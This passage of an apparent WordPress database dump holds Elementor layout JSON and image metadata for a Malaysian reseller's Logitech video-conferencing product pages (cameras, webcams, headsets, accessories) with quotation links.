zoom<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e3ff14a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a021238\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5be05f3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"aea13c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"790f00c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/rally-camera-e1544499263206.png\",\"id\":1247}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"322d778\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>Rally Camera<\\/h4><p>Premium PTZ camera with Ultra-HD imaging system and automatic camera control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5fe363c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"3862603\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"8e81386\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"51d763e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7410c4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>VC ROOM SOLUTIONS<\\/h2><p>Complete room solutions from Logitech allow participants to quickly kick off and run a video conference meeting.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"75fc0cb\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"345e12f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b63babc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be0e6a0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/logitech-smartdock-flex.png\",\"id\":1397},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9005f6d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SMARTDOCK<\\/h3><p>Secure meeting room console designed for Skype Room Systems<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b9dedfe\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"9b49863\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"433835b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ff5eeb4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a4767f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>WEBCAMS<\\/h2><p>Designed to work with any VC software, Logitech webcams offer instant collaboration with high-quality HD video.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0f3d021\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5fe6e79\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b4e24a2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/briopictograms.png\",\"id\":1332}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9a3535d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>BRIO<\\/h3><p>4K Ultra HD webcam with RightLight\\u2122 3 with HDR<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"fba2ea6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c05d87c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12d5f47\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/c930e-webcam.png\",\"id\":1334}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91bee63\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech C930e<\\/h3><p>Business webcam with a wide field of view and HD digital zoom<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4e520f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c71a30b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f62006e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/c925e-webcam.png\",\"id\":1336}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"a94baf9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech C925e<\\/h3><p>Affordable 1080p HD webcam with integrated privacy shade<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"086da3d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ae10c21\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"93d444d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5ab9b49\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"858059a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/b525-pdp-2017-refresh.png\",\"id\":1354}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca4407c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech B525<\\/h3><p>Ideal for on-the-go professionals with a compact, foldable, 360\\u00b0 swivel design<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"009af69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"fe5d066\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9072abf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6c257c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c2db587\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>HEADSETS<\\/h2><p>Stylish and affordable, Logitech headsets are designed for long-lasting comfort to make every call more productive.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aea83c8\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"a1561a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5e39286\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ece341e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/h570e-headset.png\",\"id\":1364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e3497b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech H570e Headset<\\/h3><p>Comfortable, affordable, and built to last<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"785345f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b698d09\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"16f5dd5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c4a4a72\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6b09cb7\",\"elType\":\"widget\",\"settings\":{\"title\":\"VIDEO COLLABORATION ACCESSORIES\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f31cb09\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"12ed18d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"38d7d0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/smartdock-extender-box.png\",\"id\":1386}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9cbda85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SMARTDOCK EXTENDER BOX<\\/h3><p>Connectivity options for Logitech SmartDock<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f575023\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"08edb2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"85c2829\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/logitech-screen-share.png\",\"id\":1391}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f3f660b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech Screen Share<\\/h3><p>A fast, familiar, and affordable way to share content in the conference room and into online meetings.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"77dadd4\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b20ef35\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3211191\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-expansion-microphones.png\",\"id\":1392}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2a65808\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP EXPANSION MICS<\\/h3><p>Add-on mics for larger groups<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6a71d0d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac7c83c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f6834a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"13a33a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/logitech-smartdock-flex.png\",\"id\":1397}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5b6e717\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Logitech SmartDock Flex<\\/h3><p>Expansion Kit for Logitech SmartDock<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5014200\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"366eb59\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dc59d5f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-15m-extended-cable.png\",\"id\":1401}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e222e61\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP 15M EXTENDED CABLE<\\/h3><p>15 meter cable for video conferences in larger rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b6bbdef\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b7c0191\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8128e7a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/group-10m-extended-cable.png\",\"id\":1404}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"a506052\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP 10M EXTENDED CABLE<\\/h3><p>10 meter cable, ideal for large conference rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"da882ae\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"509c931\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2438d41\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f231a38\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bc953c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/meetup-expansion-mics.png\",\"id\":1406}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"db20012\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>EXPANSION MIC FOR MEETUP<\\/h3><p>Add-on microphone for huddle room flexibility<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"33673e4\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"cfcc955\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(5438,2927,'_elementor_version','0.4'),(5441,2928,'_edit_lock','1551680693:1'),(5442,2928,'_edit_last','1'),(5443,2928,'_elementor_edit_mode','builder'),(5444,2928,'_elementor_template_type','post'),(5445,2928,'_wp_page_template','template-fullwidth.php'),(5446,2928,'_hide_page_title',''),(5447,2928,'_hide_header',''),(5448,2928,'_hide_footer',''),(5449,2928,'_hide_breadcrumb',''),(5450,2928,'_cover',''),(5451,2928,'_show_excerpt',''),(5452,2928,'_wc_apply_product',''),(5453,2928,'_yoast_wpseo_content_score','60'),(5454,2929,'_elementor_edit_mode','builder'),(5455,2929,'_elementor_template_type','post'),(5456,2929,'_wp_page_template','elementor_header_footer'),(5457,2930,'_wp_attached_file','2019/03/meetup-conference-cam.jpg'),(5458,2930,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:930;s:6:\"height\";i:523;s:4:\"file\";s:33:\"2019/03/meetup-conference-cam.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"meetup-conference-cam-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"meetup-conference-cam-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"meetup-conference-cam-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:33:\"meetup-conference-cam-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:33:\"meetup-conference-cam-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:33:\"meetup-conference-cam-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:31:\"meetup-conference-cam-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5459,2930,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:8.816859499357224905224938993342220783233642578125;s:5:\"bytes\";i:6104;s:11:\"size_before\";i:69231;s:10:\"size_after\";i:63127;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.800000000000000710542735760100185871124267578125;s:5:\"bytes\";i:306;s:11:\"size_before\";i:3121;s:10:\"size_after\";i:2815;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.9199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:464;s:11:\"size_before\";i:5856;s:10:\"size_after\";i:5392;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.9399999999999995026200849679298698902130126953125;s:5:\"bytes\";i:2184;s:11:\"size_before\";i:24419;s:10:\"size_after\";i:22235;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.3599999999999994315658113919198513031005859375;s:5:\"bytes\";i:456;s:11:\"size_before\";i:5456;s:10:\"size_after\";i:5000;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.480000000000000426325641456060111522674560546875;s:5:\"bytes\";i:976;s:11:\"size_before\";i:11504;s:10:\"size_after\";i:10528;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.0999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:1718;s:11:\"size_before\";i:18875;s:10:\"size_after\";i:17157;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}}}'),(5477,2935,'_wp_page_template','elementor_header_footer'),(5476,2935,'_elementor_template_type','post'),(5475,2935,'_elementor_edit_mode','builder'),(5474,2928,'_elementor_data','[{\"id\":\"00be070\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"84682c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0a77ac1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>MEETUP<\\/h2><p>All-in-One ConferenceCam with an extra-wide field of view and integrated audio, perfect for small conference and huddle rooms<\\/p><ul><li>See everyone, even those close to the camera<\\/li><li>RightSense\\u2122 Technologies with automatic framing<\\/li><li>Compact design minimizes cabling and clutter<\\/li><\\/ul>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"03b6797\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"963c473\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/meetup-conference-cam.png\",\"id\":1316},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f3383c\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39a9a19\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fd44a2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>PERFECT FOR SMALL ROOMS<\\/h2><p>MeetUp is Logitech\\u2019s premier ConferenceCam designed for small conference rooms and huddle rooms. Stop crowding around laptops. With an extra wide field of view, motorized lens and rightsight\\u2122 auto framing plus a pan\\/tilt lens, MeetUp makes every seat at the table clearly visible. With integrated audio optimized for huddle room acoustics, everyone can be heard as well as seen.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a1e6e4a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"93a8ede\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f333ba6\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/tD_tmRMN2OA\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"65c40a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9a6e2b9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>A WIDE VIEW FOR TIGHT SPACES<\\/h3><p>Logitech\\u00ae MeetUp brings remarkable video quality to small conference rooms. Its extra wide field-of-view easily accommodates huddle rooms where people sit on either side of the camera. The 4K ultra high-def sensor and Logitech lens deliver extra sharp clarity, while pan, tilt, and zoom controls let you focus on presenters and their visual aids.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a3562e7\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"fc4fd72\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2c46c3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>HEARING IS BELIEVING<\\/h3><p>Housed within a patent-pending anti-vibration enclosure, three beamforming mics MeetUp\\u2019s integrated audio is optimized for huddle room acoustics, delivering exceptional sound in small rooms. Three beamforming mics and a custom-tuned speaker ensure meetings sound as great as they look. Add Expansion Mic for MeetUp to extend the audio range up to 4.2 meters.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"679bfe0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6a0541c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/meetup-conference-cam.jpg\",\"id\":2930}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d325f5c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ce92ebf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1e20686\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/CqeUIzYth_w\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"f858b37\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"fcf3b26\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>AS EASY AS PLUG AND PLAY<\\/h3><p>Step into a huddle room and instantly start a video collaboration. Whether it is Video conferencing, recording, or broadcasting applications that support USB cameras MeetUp simply works.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5350d12\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"939cb8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6523bac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DESIGNED FOR THE WAY PEOPLE MEET<\\/h3><p>Small conference rooms are growing in popularity, and MeetUp rises to the challenge. It provides superb 